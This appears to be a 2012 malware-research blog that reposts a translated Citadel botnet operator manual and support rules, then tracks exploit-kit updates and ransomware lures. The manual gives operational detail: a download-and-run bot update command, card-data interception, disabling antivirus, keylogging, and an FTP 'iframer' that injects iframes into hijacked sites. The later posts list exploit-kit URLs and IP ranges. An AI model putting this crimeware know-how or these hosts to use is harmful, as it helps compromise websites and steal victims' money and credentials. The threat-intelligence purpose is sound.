 * Api.php / <token> / iframer / ftpList? Date_from = 2012-12-31 & state = all & plaintext = 1

For other examples of work with the API, see the comments in the script api.php

************************************************** ******************************

How to update ========================== >>>>> admin bot and one during the next version of Citadel

************************************************** ******************************

Perezaleyte and rewrite all the scripts on the server and go to the folder / install /, clicking Update - wait until your table will be updated, it may take a long time.

If you have too clogged database, you will have the meaning set admin again in the new folder and transfer it to a team of bots user_execute http://www.host.com/newcitadel.exe

Note that the config format with each new version may vary, so in order to get everything working properly, set NEW (going with the version in the archive) to your configuration settings and perezaleyte it in the folder files, along with the exe-file and the video module ( MANDATORY). Pay attention to the emerging new option in the config file that we provide along with the Builder.

Then, in order to get your bots are updated to the new version, you can run user_execute http://www.temphost.com/newcitadel.exe

Make sure the exe is available from the web at this link.

Enjoy.

************************************************** ******************************

Description ========================== >>>>> additional options in the config builder

************************************************** ******************************

  disable_cookies 1/0 - If there is one, cookies will not be sent to you in the admin panel.

  disable_antivirus 1/0 - If set to 1, the module will be turned off MiniAV.

  enable_luhn10_get 1 - Module CardSwipe, if one is, will intercept the card / dumps in the GET request.

  enable_luhn10_post 1 - Module CardSwipe, if one is, will intercept the card / dumps in the POST request.

  remove_certs 1 - If there is one, will not send certificates.

  timer_autoupdate 8 - Time in hours, auto-update exe from the folder files /. In other words how many hours to download and run the exe each time.

  disable_httpgrabber 1 - If set to 1, disables HTTP grabber reports in Google Chrome (only in it)

  report_software 1 - If there is one, to send information about the firewall / antivirus / software in the admin panel.

Section entry "WebFilters"

  To activate the screen shots, Macka insert "@ * paypal.com / *"

  If you need screenshots of the full screen, then "@ @ * paypal.com / *"

  To activate the video recording, "# * paypal.com / *"

entry "WebFakes" - VEBFEYKI do not work!

************************************************** ******************************

========================== >>>>> FTP-ifreymer. Characterization

************************************************** ******************************

A) The script ifreymera

Poured on the left site and used as a "pad": performs all the work. Click the "Download Script" and fill it to the left on some ftp host.

He manages a special crontask from your admin area.

Debugging features:

* Create a folder next to the script iframer / writable. There he can save the preview ifreyminga files.

* Create a script file next to 'iframer.php.log' (the script name with the extension +. Log): it is there automatically will write logs of action, found the folder ...

* Do not forget to put right if you want to 666.777 debugging to do.

You can download it on the page ifreymera in socket: [download].

Physically he is in the system / utils /. Here, he is not called directly, just kept :)

Sam ifreymer to work does not require any files and records of rights, he carefully uses the PHP-session to store dannyah.

B) Configuration

Allows you to specify:

* URL-ifreymera script to run.

* HTML-code to insert

* Mode of action. 'Off' off, 'inject' insert HTML-code, 'preview' preview without changing the files on the FTP: proifreymlennye save files in the folder 'iframed /' next to the script (if it exists and is writable)

* Method of injection: a clever (not to damage the PHP / JS / ASP) files, write to the end, rewriting

* Depth bypass folders (levels 1 to 50)

* Masks for files and folders.

File ifreymitsya only if the folder and file have come to one of the masks.

If the folder has coincided with a mask - the depth of crawl increases (in the case of deeply mortgaged public_html)

C) The principle of client-side

First, before each phase of the communication sockets with ifreymerom last self-test is whether all the vital functions to work on, predictably, there is a server .... If the selftest failed - no work will be performed.

A cronjob every 10 minutes, collects new ftp-accounts from the database and creates jobs. Repeated ftp-acca is not allowed.

These accounts are fast on the script ifreymer and added to the list of "tasks" regardless of whether it is currently running or not.

Another cronjob also runs every 10 minutes. It just runs the script ifreymer: if it still works - nothing happens, but if it was dead out there (eg, time limit) - restart will be made. Threshold restart 120sek

And finally, the last cronjob: every minute, he asked how he ifreymer are things: how many jobs done, but in the queue as ready. If you have accounts with whom he had already finished - they pulled out and saved. In these ifreymere acca removed to save memory.

To avoid possible errors entire two-stage data transfer: request, response, request a confirmation action.

If during the day on no account of the results - he goes again.

D) Principle of operation of the ifreymera

At the beginning of the script is a list of file extensions to ignore. They do not change even if approached one of the masks.

Ifreymer stores the data in the session: they are included in all hosting services, and there is no need to play with the rights or seek a folder writable :) Written by taking into account the possible work, even under PHP4 (it is necessary to check with the event).

Ifreymer know how to properly recycle and breathe on timelimit'u: no sensitive data is not lost, it can continue to place a stop.

When you break the connection ifreymer can reconnect the next time.

Phases of work:

A. An attempt to connect. If it fails three times in a row - ACC is marked as invalid.

If many akkov to which you can not connect - ifreymer can "hang" raking timeouts. This is normal: it tries :)

Two. An attempt to authenticate. If you can not - ACC invalid.

Three. Listing all the folders and files to a specified depth. The sample files and folders matching the mask specified in the admin. To circumvent the depth approached folders increases.

4. Phase ifreyminga. Note that in the mode of 'preview' files to the FTP does not change!

For each file is determined by its type (by extension) that defines a method ifreyminga. It supports: html, php, CSS, JS, asp (or equivalent extension)

To add code ifreyma special marker to avoid accidental re-ifreyminga file.

In the smart code is added to the top of the php-file, but he ifreym output at the end :)

In the append code appended to the file. Cleverly is determined not to break the syntax of the code. JS-files infected by the introduction of the code drawing a iframe.

* At all stages of the statistics are collected, the list of changed files.

Ifreymerom run two tasks:

* "Start" works off automatically every 10 minutes, he acrobystitis new accounts, and includes a long process of verification.

* "Fee" - at any moment, picks up that it is ready

E) Interface

Shows the status of ifreymera (in fact, the state of cron-tasks). You can manually pull the job to update the information.

Displays a list of accounts. For each: Status, Error, a list of pages (by clicking), statistics (by clicking).

Invalid accounts are deleted after one day: poviseli and disappeared.

*) The principle of work assignments and ifreymera on his fingers:

Setting the "start": every 10 minutes

Get some new akkov and append them to the end of the list of tasks.

Next ifreymer passes on the task list (subscription)

Take the 1st acc. Connect. It did not work during the 10s? Lay off, recheck.

Take the 2nd. Joined! Log in but failed. With that done, he invalid.

Take the third. Do not connect. Also recheck.

Take the 4th. Connected. Logged. Parse .. ifreymim .. completed, it is valid.

Set "collection":

it may at any time to connect and pull out the intermediate results) Here is the 2nd and 4th, if they could work out.

When the 1st and 3rd ACC a few words of disconnection - they will be marked as invalid.

Added the latest features:

- Mode "check only". Speaks for itself

- Option: reifreyming accounts after N days. Each account after N days will be processed again.

- Replacement of old ifreym new code. If the changed HTML-code - it does not add a stupid replace the old :)

- Option "acca ifreymit only yesterday." Day to give it to ignore arrange)

- Logging of errors ifreymera (!)

- Intelligent detection of folders (they are indistinguishable from files)

- Reset button. Thanks to protect against re-ifreyma accounts will not spoil it :) Zaignorennye acca stored (ie not too spoiled)

- Selective ignore accounts (not ifreymit for anything). Reported ignore accounts displayed per day and hide. If you make a reset - and they will remain hanging all day.

- Sort by: Recent Developments (found, shipped, processed) in chronological order from top

- The lever of a manual start (full manual mode). This is done by click on the instructions above, if ifreymer mode "off"

  For example, clicking the first to receive new acca. Necessary zaignoril, click the second: they fly away for processing.

  The third task - to collect the results - always fulfills itself :)

  

************************************************** ******************************

Keylogger processes ========================== >>>>>

************************************************** ******************************

To enable the keylogger in the config Builder prescribes a new section:

 entry "Keylogger"

    processes "calc.exe; * notepad *"

    a time

  end

  * Notepad * find the right process on behalf of

  calc.exe the exact name of the process

  Here we enumerate the list of processes which we set the keylogger.

  Recall that a keylogger is on by default for all browsers, so use the module, if you need to keep track of separate-made applications.

  time of 1 indicates the time in minutes, how many minutes in a row, since the application started to record key.

  Section need to register before section entry "CmdList" or after it.

  

  To search for records in admin area, select the type of report: "Keylogger"

  

************************************************** ******************************

GeoIP ========================== >>>>> Filtering Protection botnet

************************************************** ******************************

To enable a module, go to "Options" in the admin, there is a point "Permitted country", put a check on and celebrate the right of the country.

All countries that are not marked you automatically fall into the ignore list, however, reports of them will still be written, but when you request a config file.php and sending requests to the gate, the bots will be issued a 404-level HTTP-server (you can check out a sniffer)

Budget option from the abuse. Recommended only for small VIP-compartmentalized botnets in order to transfer the securities to a particular botnet bots.

If you notice a strong load on the server, immediately turn off the setting.

************************************************** ******************************

========================== >>>>> Double-log Cleaner

************************************************** ******************************

To enable or disable the module, you must go to "Options" sub-functions - "Deduplication reports" enable and disable.

If you notice a heavy load on the server, immediately disconnect the module in the settings.

  

************************************************** ******************************

************************************************** ******************************

-------------------------------------------------------------------------------------------
Как задавать вопросы.txt - Original (Pastebin)
------------------------------------------------------------------------------------------- 

Тема вопроса: Как обращаться в support и правильно задавать вопросы и решать проблемы.

Итак, предположим у вас случилась какая-то проблема с админкой или ботом.
 Что делать? Прежде всего, вам конечно же, кажется что это баг в продукте, вам выдали ошибочный билдер, вам залили неправильные скрипты и вообще мир настроен против вас! Давайте оставим эмоции на потом, и будем рассуждать решать все логическим путем. Ответим себе на несколько вопросов:

 1) Что было сделано в последний раз, после чего перестало что-то работать?
 2) При каких условиях это было сделано (тестирование прогрузкой ботов, на виртуальной машине, перенос старых ботов)

 Правильно ли настроен сервер? Убедитесь что вы имеете последнюю версию скриптов + билдера.
 Правильно ли выставлены у вас права на сервере? стоит ли везде chmod 777 на нужных файлах?
 Вообще, рекомендуется для серверов использовать панель Direct Admin т.к она значительно упрощает работу с доменами.
 Опять же, если вы не обладаете навыками администратирования серверов, не пытайтесь сделать из мухи слона. Наймите человека кто за доп.плату вам настроит сервер и установит при желании скрипты Citadel. За хорошую плату вам поставят защиту от DDoS'a и правильно-выставленные безопасные юзерские привелегии. Тех.поддержка не занимается администратированием ваших серверов и их настройкой, мы отвечаем только за скрипты Citadel. Проверяйте сначала проблему всегда на уровне сервера и клиента(настроек конфига) и общайтесь с админом, может быть отстук упал у вас из-за того, что сеть попала в блек-лист SpamHaus? Или админка не может установиться из-за того, что вы запустили апач под рутом? А может в конфиге неправильно выставлена маска урлов? Посмотрите еще раз в главный мануал.
 Любого админа можно нанять через соответствующие форумы и доски фрилансеров типa free-lance.ru
 Услуги админов стоят в районе 100-200$.
 Не экономьте на грамотной настройке сервера - это ваша инфраструктура.

 У вас не работает бот?
 Проверьте соответствует ли RC4 ключ в админке и в боте.
 Работает ли корректно ваш крипт? Работает ли версия без крипта ?
 Не присылается видео отчет? Проверьте, не стоят ли ограничения в PHP/Apache на загрузку файлов.
 Вылетает ошибка Mysql: too many connections ? Проверьте, корректно ли работает ваш MYSQL-сервис на сервере, может быть он криво настроен, либо ваш сервер перегружен. 
 Может быть вас DDoS'ят? Смотрите куда и на что идет нагрузка, на какие скрипты. Воспользуйтесь штатными утилитами.

 Пытаетесь запустить на VmWare и у вас не работает бот? Проверьте вашу внимательность, случаем, не русская ли это версия образа винды?
 Не работает VNC гейт? Смотрите, работает ли PHP вообще на Windows-сервере, и правильно ли он настроен VNC-коннектор.

 Оцените субъективно вашу внимательность к деталям, уверенность в действиях и логические шаги и приступайте к тестированию. Не бойтесь экспериментировать, ничего не сломается. Что-то внедрили? Протестите сначала на себе и на малом количестве ботов, прежде чем внести в работу.
 Сначала протестируйте, потом пишите в саппорт. Не надо писать "у меня не работает что-то..." пишите сразу условия: что вы делали, как вы делали, где вы делали, что произошло, что не произошло, что должно произойти. Как можно больше информации в 1 сообщении! Представьте, что вы даете показания и описываете ВСЕ МЕЛЬЧАЙШИЕ ДЕТАЛИ. 
 Например: "У меня не работает VNC, запускаю бота на вмваре - отстукивает в основную админку. Даю команду на выполнение соединения уже в VNC админке - дальше ничего не происходит, проверил работает ли вообще Windows-сервер: тут у меня возникли сомнения, т.к отображается содержимое php-файлов в браузере, что может быть?"
 Помните: правильно сформулированный вопрос - половина правильного ответа.

 Клиентов становится больше, а саппорт один, поэтому каждый должен соблюдать нижеприведенные условия!
 Озвучу несколько важных правил, при обращении к саппорту:
 1) Никогда не пишите "привет? как дела?", из этой же серии "ты тут?", эти вопросы всегда останутся без ответа. Пишите сразу ваш вопрос/предложение/баг ОДНИМ сообщением, прилагайте как можно больше информации: что делаете, как делаете, какой результат, что хотелось бы получить.
 2) Пишите с того же Jabber'a, с которого делали заказ продукта, никаких саппортов, доверенных лиц и т.п мы не принимаем к общению, если вы их не указали заранее при покупке.
 3) Пожалейте наши глаза, не пишите по возможности TRANSLITOM - скорость считывания информация и ее усваивание снижается в разы! 
 4) Не долбите вопросами "когда будет апдейт?", "когда уже выдашь?", "когда будет это?" - если вы что-то заказали или разместили заявку, значит мы непременно на нее ответим и выдадим вам что нужно, т.к все записано. У саппорта есть свои приоритеты на разные типы заявок, если мы что-то задерживаем, значит оно так надо, это может быть дополнительное тестирование, багфикс и т.п
 5) Не стоит задавать откровенно глупые вопросы, на которые вы можете найти ответ потратив 5 минут поиска в гугле, либо спросив у коллег по цеху на форуме. Вопросы в стиле "как закачать файлы на сервер", "почему не работает домен", "как выставить права" и т.п остаются без внимания.
 6) Чем больше вы даете информации по проблеме, тем качественнее и доступнее вы получите ответ.
 7) На вопросы когда будет апдейт, когда выдадут покупку и т.п саппорт НЕ отвечает, если вы подали заявку на что-то, она будет обработана в ближайшее время и мы про нее не забыли. Подобными вопросами будете только действовать на нервы и мешать доработке.
 Срок обработки, если вы хотите купить новый модуль от 3 до 48 часов. В связи с большим количеством разных заявок (смена железа, докупка модулей, покупка лицензии, перевязка партнеру...) все заявки на получение чего либо(например купленного модуля) будут обрабатываться от 3 часов до 48 часов.
 Убедительная просьба не спрашивать и не задавать вопросы, когда что-то будет или появится, не писать каждые 5 минут "как там дела? когда уже выдашь покупку?" - этим вы никак не ускорите процесс выдачи, а только будете отвлекать от работы и саппорта и кодера. Все заявки собираются в течении 1-2 дней и комплекты отдаются разом в одно время всем, никаких "мне как можно скорее" быть теперь не может.

 Спасибо за внимание.

------------------------------------------------------------------------------------------- 

Как задавать вопросы.txt (How to ask questions) - Google Translate (Pastebin)
-------------------------------------------------------------------------------------------
Subject: How to contact the support and to ask questions and solve problems.

So, suppose you have a problem occurred with the admin panel, or a bot.
 What should I do? First of all, you certainly seem that this is a bug in the product, you gave a wrong builder, you have filled in the wrong scripts and all the world is against you! Let us leave emotions for later, and we will resolve all logical reasoning through. Answer a few questions:

 1) What has been done for the last time, then something is no longer working?
 2) Under what conditions it was done (testing progruzki bots, you need a virtual machine, moving the old bots)

 Properly configured server? Make sure you have the latest version of the script + Builder.
 Are the exhibits you have rights on the server? whether all the necessary chmod 777 on files?
 In general, it is recommended for servers using Direct Admin panel unnecessarily it is much easier to work with domains.
 Again, if you do not have the skills administratirovaniya servers, do not try to make mountains out of molehills. Hire a person who is for extra charge you a set up a server, if desired scripts Citadel. For a fee you will put a good defense against DDoS'a and well-exposed safe yuzersky privileges. Technical support is not engaged in administratirovaniem your servers and their configuration, we answer only for the scripts Citadel. Check the first problem is always at the server and client (config settings) and keep in touch with the administrator, can you otstuk fell due to the fact that the network came in black-list SpamHaus? Or admin panel can not be established due to the fact that you are running apache as root? And maybe in the config correctly put the mask URLs? Look again at the main manual.
 Any administrator can hire through the appropriate forums and message boards freelancers tipa free-lance.ru
 Services admins are around $ 100-200.
 Do not skimp on well tuned server - this is your infrastructure.

 You are not running a bot?
 Check whether the RC4 key in the admin panel and in the paper.
 Does your well-crypt? Does the version without the crypt?
 Do not send video reports? Check if there are any restrictions in the PHP / Apache to load the files.
 Flying bug Mysql: too many connections? Check whether your MYSQL-running service on the server, it can be configured crooked, or your server is overloaded.
 Maybe you DDoS'yat? See where and what is the load at which scripts. Take advantage of full-time utilities.

 Trying to run on VmWare and you are not running a bot? Check your attention, the case is not whether the Russian version of this image of Windows?
 VNC is not working the gate? See if it works at all PHP on Windows-based server, and whether it is configured VNC-connector.

 Evaluate your subjective attention to detail, confidence in the actions and the logical steps and start testing. Do not be afraid to experiment, do not break. Something is implemented? Protest at first on himself and on a small number of bots before they make to the work.
 First test, then write in a support. No need to write "I have something not working ..." write once conditions are met: what did you do as you did where you did, what happened, what happened, what should happen. How much information in a message! Imagine that you are giving evidence and describe all the fine details.
 For example: "I do not work VNC, run the bot on vmvare - knock to the main admin. I give the command to execute VNC connections already in admin area - then nothing happens, check whether all Windows-Server: here I have a doubt, that displays the contents of a php-file in a browser that can be? "
 Remember: correct our problem - half the correct answer.

 Clients become more and a support one, so everyone should abide by the conditions stated below!
 Announced a few important rules when referring to a support:
 1) Never write "hello? How are you?" Of the same series, "are you?" These questions will always remain unanswered. Write once your question / suggestion / bug in one message to attach as much information: what you are doing, as do, what is the result that we would like to receive.
 2) Write to the same Jabber'a, from where did the order of the product, no tech support, proxies, etc. We do not accept to communicate if you do not specify in advance the purchase.
 3) Have pity on our eyes, do not write as possible TRANSLITOM - speed reading information and its assimilation is reduced at times!
 4) Do not peck issues "when the update?", "When it betray?", "When will it?" - If you ordered something, or have placed a request, then we will certainly respond to it and issue you need, everything is written unnecessarily. In tech support have their own priorities for the different types of applications, if we do something to detain, then so be it, this may be additional testing, bug fixes, etc.
 5) Do not ask stupid questions frankly, to which you can find the answer after spending five minutes of searching in google or asking colleagues to shop online. Questions in the style of "how to upload files to the server", "why does not work domain," "how to set the right", etc. are neglected.
 6) The more you give information on the problem, the better and more available you will receive a response.
 7) On the issues when the update, will be given when the purchase of a support, etc. is NOT responsible if you have applied for something, it will be processed as soon as possible and we have not forgotten about her. Such questions will only act on the nerves and interfere with refining.
 Processing time, if you want to buy a new module from 3 to 48 hours. Due to the large number of different applications (change of iron, Buy-modules, the purchase of a license, bond partner ...) All applications for which either (for example, bought the module) will be processed from 3 hours to 48 hours.
 Please do not ask and do not ask questions when something will or will not write every 5 minutes, "how are things? When it betray a purchase?" - That you can not speed up the process of issuing, and will only detract from the work and tech support, and an encoder. All applications are collected within 1-2 days and sets are given once at the same time for all, no "to me as soon as possible" may not be now.

 Thank you for your attention. 
------------------------------------------------------------------------------------------- 

Some Security Related Reports :

Corporate Computer. Java 7 u5 (last version nice !) but.... also Java 6 u27 (<-- Updated to 33 you wouldn't be there)

German owner of compromised website investigating

Last reports of a Finish User who seems to have understood.

More about Citadel ? take a look at https://www.botnets.fr/index.php/Citadel (you'll find related publications)

Update to Blackhole Exploit Kits: v1.2.5

July 31, 2012, 1:39 pm

≫ Next: Lost in design - Tobfy

≪ Previous: Inside Citadel 1.3.4.5 C&C & Builder - Botnet Control Panel

$

0

0

Paunch notification on Exploit.in about v1.2.5

Original text of the advert (Pastebin) :
-------------------------------------------------------------
вышла версия 1.2.5


из новинок:
+ добавлен XML эксплойт под ИЕ (работает на всех ОС)


всех прошу за обновкой


Царь, 
список эксплойтов на данный момент
Java CVE-2012-1723 - версия явы 1.7.0.4 и младше
PDF LibTiff
PDF ALL (содержит 3 эксплойта под ридер младже 8й ветки)
Flash (пак состоящий из двух CVE, под старые версии флеша, но до сих пор дает пробива не много)
Flash AVM CVE-2011-2110 (этот эксплойт под флешь дает побольше пробива чем предыдущий пак)
MDAC (в его актуальности нет смысла разубеждать, потому как ИЕ6 траф до сих присутвует + мы следим за чистотой этого сплойта от проактивных антивирусов)
HCP (В скором времени планируем убрать, но пока еще не много выжимает)
IE XML (последний добавленный эксплойт)
----------------------------------------------------------------
Google Translate (Pastebin) :
----------------------------------------------------------------
released version 1.2.5


of new products:
 + added an XML exploit for IE (works on all systems)


All I ask for new clothes


King,
list of exploits at the moment
Java CVE-2012-1723 - Java version 1.7.0.4 and earlier
PDF LibTiff
PDF ALL (includes three exploit a reader mladzhe 8th branch)
Flash (pack consisting of two CVE, under the old versions of Flash, but still gives the punching is not a lot)
Flash AVM CVE-2011-2110 (this exploit allows a little more flush than the previous punching bags)
MDAC (in actuality it makes no sense to argue, because the cores IE6 + is present so we are watching over the purity of the sployty of proactive anti-virus)
HCP (soon going away, but still not a lot of presses)
IE XML (recently added an exploit)
------------------------------------------------------------------

XML > ? CVE-2012-1889 as spotted by Sophos in Zero-day XML Core Services vulnerability included in Blackhole exploit kit

Edit 1: Confirmed : http://wepawet.iseclab.org/view.php?hash=7847ebf7b2d9def31251039e995dc91d&type=js

Edit 2:  On one BH 1.6% of the successfull exploitation (but never easy to interpret as there are many factors involved)

See end of  "Inside Blackhole Exploits Kit v1.2.4" for detailed list of past Exploits + Doc

Lost in design - Tobfy

August 10, 2012, 11:17 pm

≫ Next: Inside Upas Kit (1.0.1.1) aka Rombrast C&C - Botnet Control Panel

≪ Previous: Update to Blackhole Exploit Kits: v1.2.5

$

0

0

The Ransomware Tobfy is back in town.

After an attempt to create a new design targeting many countries, the project seems to have been canceled.

(See for Instance the Design built for Ireland and Canada never fully translated :

Tobfy.B Irish Design - Canceled work in progress

Tobfy.B Canada Design -  Canceled work in progress

)
they are back with their design of june for AT/DE/ES/GB/IT/PT (knowing that this design is build up April Reveton Design - See : botnets.fr/index.php/Tobfy and botnets.fr/index.php/Reveton

Tobfy in August 2012 - June Design reused (Slight modification of April Reveton Design)

and they are targeting new countries ( BE/CH/FI/GR/NL/PL ) with Weelsof as of June design (See Greece and Finland :

Tobfy - August 2012 - Finland - June Weelsof Design Ripped

Tobfy - August 2012 - Greece - June Weelsof Design Ripped

)
For more Weelsof design take a look at botnets.fr/index.php/Weelsof

Lost in Design...

Edit : CH/NL design is in fact : Gimemo Design as of April/May

Tobfy - CH - 08/2012 - Gimemo Design Rip.

Tobfy - NL - 08/2012 - Gimemo Design Rip

Inside Upas Kit (1.0.1.1) aka Rombrast C&C - Botnet Control Panel

August 16, 2012, 10:00 am

≫ Next: Ransom.II - UGC payment for USA - Windows Genuine impersonation for DE

≪ Previous: Lost in design - Tobfy

$

0

0

In middle of june a new botnet was advertised on underground forum as Upas Kit. (see end of this post for advert). Bot is recognized by Microsoft in Win32/Rombrast familly

Upas - Login Screen

Upas - Map

Upas - Bots

Upas - Statistics - Bots Online

Upas - Statistics - Online Bots

Upas - Statistics - Arch

Upas - Statistics - Countries

Upas - Statistics - Comparing months

Upas - Statistics - Spreading

Upas - Statistics - Bots Summary statistics

Upas - Statistics - Version

Upas - Statistics - OS

Upas - Statistics - Permissions

Upas - Stats

Upas - Logs - FTP

Upas - Logs - Spreadings

Upas - Logs - Botkill

Upas - Logs - Passwords

Upas - Logs - Ruskill

Upas - Logs - Injects

Upas - Tasks

Upas - Public Link to tasks

Upas - Download logs

Upas - Settings list

Upas - Settings

Upas - Settings - Create user

Upas - Settings - Users list

Upas - Settings - Banned Users

Upas - Settings - Blacklist

Upas - Settings - Login logs

Upas - Settings - Change files name

Upas - AdminCP

Upas - Server Side Tree

Here is the initial advert on Exploit.In :

Upas Kit 1.0.0.0 as adverted by auroras on Exploit.in on the 14th of june 2012

You'll find the Original text of this advert here :

http://pastebin.com/T8b0FMGA 

And its Google Translation here :

http://pastebin.com/RCN0wYez 

AntiVM analysis by EP_X0FF:

You'll find it here :

http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1736&p=14437&hilit=upas#p14462  

Auroras "reply" on this code :

Which mean he did that fast to escape ThreatExpert. And it looks like it's pretty effective :

Auroras 1 - ThreatExpert 0

For an analysis of Upas kit bot you can take a look at Onthar's post.

Here one Anubis analysis : 149fd4bdae313f2e44d86cc9be7e2453a - And here a Comodo IMA analysis : 7847d831a191833b7b845d95daf8d0c19f42322c53882c7814a0cb2cb7d9f195

(no..these are not bots of the C&C shown here ;)  )

Ransom.II - UGC payment for USA - Windows Genuine impersonation for DE

August 18, 2012, 5:45 am

≫ Next: Java 0day ( CVE-2012-4681) Update available for Blackhole Exploit Kit owner

≪ Previous: Inside Upas Kit (1.0.1.1) aka Rombrast C&C - Botnet Control Panel

$

0

0

Ransom.II introduced new designs two days ago for DE and USA.

In USA it's a new payment system appearing in the Ransom field : Ultimage Game Card

UGC logo used in Ransomware

that has been introduced in 2 designs :

Ransom.II - USA - Ultimate Game Card - 08-2012

Ransom.II - USA - Ultimate Game Card - 08-2012

Germany was hit by a new design impersonating Windows Genuine Advantage with 2 prices.
You can either pay for 50€ to "get" a new original license or 100€ for a Windows 8 (?!) upgrade.
See:

Ransom.II - DE Design appeared around 17/08/2012

Original Speach:
-------------------------------

Windows Genuine Advantage-Benachrichtigungen ist ein Bestandteil des Bemühens von Microsoft, Softwarepiraterie einzudämmen.
Diese Software hilft dabei, zu bestimmen, ob es sich bei der auf Ihrem Computer installierten 
Windows Version um eine Originalversion oder Raubkopie handelt.
Leider konnte diese Prüfung nicht erfolgreich abgeschlossen werden, daher wurde der Zugriff auf
Ihren Computer temporär gesperrt.
Als Gründe hierfür gelten eine abgelaufene oder mehrfach verwendete Windows-Lizenz, sowie eine illegal erworbene Windows-Lizenz (Raubkopie).
Um den Zugang zu Ihrem PC und den darauf befindlichen Daten wieder zu erlangen, können Sie
über das Bezahlfeld eine neue Original-Lizenz erwerben.
Um eine Lizenz zu erhalten, erwerben Sie bitte einen Code eines unserer offiziellen Partner Paysafecard oder ukash und geben Sie diesen in das unten vorgesehene Fenster ein und 
bestätigen Sie mit "OK".
Eine Lizenzierung erfolgt automatisch innerhalb der nächsten 12 Stunden, bitte lassen Sie Ihren Computer in dieser Zeit eingeschaltet, damit der Vorgang durchgeführt werden kann.
Falls Sie ein Upgrade auf Windows 8 wünschen, ist dies zu einem Einführungspreis von nur 100 € möglich.

Vielen Dank für das in Windows und Microsoft gesetze Vertrauen.

----------------------------------
Google Translate of this text :
----------------------------------

Windows Genuine Advantage Notifications is a part of the effort by Microsoft to curb software piracy.
This software helps you to determine whether it is installed on your computer
Windows version is genuine or pirated copy is.
Unfortunately, this test could not be completed successfully, so has access to
Your computer is locked temporarily.
The reasons for this are an expired or repeatedly used Windows license, and illegally obtained a Windows license (bootleg).
To gain access to your PC and the data on it is again, you can
purchase via pay to enter a new original license.
To obtain a license, please purchase a code of one of our official partners or Paysafecard ukash and enter it into the bottom window and provided
confirm with "OK".
A license is automatically within the next 12 hours, please leave your computer turned on at this time, so the procedure can be performed.
If you wish to upgrade to Windows 8, it is possible for an introductory price of only 100 €.

Thank you for the trust laws in Windows and Microsoft.
--------------------------------
Note the request to wait 12 hours, in my opinion to use/wash the payment (As far as I know this one is not stealing Password or using computer to perform DDoS or other stuff, but with this version it will reboot your computer before being displayed.
It seems mainly deployed via Adfly Malvertising and through Sweet Orange exploit Kit.
For other countries the design has been slightly modified but nothing really new.

For all known landing page from Ransom.II take a look at botnets.fr/index.php/Ransom.II
For more information about Malverstising Campaign (FR) : See Malekal's site
For an inside view of this specific Affiliate see this Xylitol's blog post

Java 0day ( CVE-2012-4681) Update available for Blackhole Exploit Kit owner

August 28, 2012, 2:14 am

≫ Next: CVE-2012-4681 - On its way to Sakura Exploit Kit too

≪ Previous: Ransom.II - UGC payment for USA - Windows Genuine impersonation for DE

$

0

0

According to a post of Paunch, the Blackhole creator, the actual java 0 day (CVE-2012-4681) is  available for Blackhole owner since yesterday evening.

Paunch post on Exploit.In about java 0 day

Original text of the notification :

ВНИМАНИЕ ВНИМАНИЕ !!!

Добавлен 0day Java эксплойт, стучите за обновками, пробив жжот...

конкуренты - подтягивайтесь )))

Google Translation :

ATTENTION!

Added 0day Java exploit to knock for new clothes, breaking is cool ...

competitors - Tightens)))

Spotted on the BH EK hiding behind 731 ips on AS57999

(Here video of Reveton being dropped in its new Swedish clothes - go 1080HD - To see all known Reveton landings : https://www.botnets.fr/index.php/Reveton )

Jar file : 08fd3413aef2012f2b078fa07855e398

Updated : 0cbc25ade65bcd7a28dd8ac62ea20186
Right now to get it :  almost any ip from 146.185.238.0/24,146.185.236.0/24 & 37.9.55.0/24
 then get Pre.jar.

Edit: Now: Leh.jar - 496ed828bdc5643ff17cb084a212deaf (far larger and slightly more obsfuscated)
(will stop keeping track here after this one)

Reading about this 0 day :
Blackhole: Faster than the speed of patch - Karmina - F-Secure Weblog - 2012-08-28
Java 7 Applet RCE 0day Gondvv CVE-2012-4681 Metasploit Demo - Eric Romang Blog - 2012-08-28

Java 0-Day Using Latest Dadong’s JS Obfuscator - Darryl - Kahu Security - 2012-08-27

Java 7 0-Day vulnerability information and mitigation. - Andre' M. DiMino and Mila Parkour - Deep End Research - 2012-08-27

New Java 0day - David Maynor - Errata Security - 2012-08-27

Recent posts on this blog about BH EK :
Update to Blackhole Exploit Kits: v1.2.5 2012-07-31
Inside Blackhole Exploits Kit v1.2.4 - Exploit Kit Control Panel 2012-07-22

---

CVE-2012-4681 - On its way to Sakura Exploit Kit too

August 29, 2012, 12:33 pm

≫ Next: CVE-2012-4681 - Связка Sweet Orange

≪ Previous: Java 0day ( CVE-2012-4681) Update available for Blackhole Exploit Kit owner

$

0

0

No surprise at all here...
Today found a strange behaviour on a Sakura EK :


http://sakura_host_on.co.cc/iniframe/e9cabf10dd[.......]
http://sakura_host_on.co.cc/?b=1
http://sakura_host_on.co.cc/forum/detect/mm.js
http://sakura_host_on.co.cc/forum/gotit.php?i=1&key=a58ba56a2d655e30366fd62f173595d0
http://sakura_host_on.co.cc/forum/New.class
http://sakura_host_on.co.cc/forum/Ini.class
http://sakura_host_on.co.cc/forum/Ini/class.class
http://sakura_host_on.co.cc/forum/New/class.class

New what ? let's guess....
http://sakura_host_on.co.cc/forum/spl/Expression.jar
a893f42b0884d58c6c481e0f23fc014b

CVE-2012-4681 piece of code almost identical to POC in a jar file  found on a Sakura EK

What else could we expect... CVE-2012-4681

Note that i was not able to trigger it so not sure it's already fully operational. Sure we can make a post like this one for each Exploit Kit.

"конкуренты - подтягивайтесь" - Paunch

CVE-2012-4681 - Связка Sweet Orange

August 29, 2012, 5:03 pm

≫ Next: CVE-2012-4681 - Redkit Exploit Kit - I want Porche Turbo

≪ Previous: CVE-2012-4681 - On its way to Sakura Exploit Kit too

$

0

0

Связка Sweet Orange

Yes, it's becoming boring.
We'll make it fast.
Using [FR] Malekal's sniper technics (hat tip)  you can find a Sweet Orange EK when you need one :


breitlingline[.]biz/ <-- Do not try to go there if you are not a security Expert !!!
petrol.thehickorymotormile.com [:] 8382/AZAgQw?wITGN=78
petrol.thehickorymotormile.com [:] 8382/6 -> c013d9497d787bcc6d7829cd1143bd8b <- incl. CVE-2012-4681
diesel.thehickorymotormile.com [:] 8382/oshPbY?expid=4&fid=7

CVE-2012-4681 piece of code found dropped by Sweet Orange

And it's working as desired by creator.

Fiddler session here : http://minus.com/lZ9tJWFeIZRfw

After Orange...want to see some Red.

CVE-2012-4681 - Redkit Exploit Kit - I want Porche Turbo

August 29, 2012, 8:38 pm

≫ Next: Blackhole Exploit Kits update to v2.0

≪ Previous: CVE-2012-4681 - Связка Sweet Orange

$

0
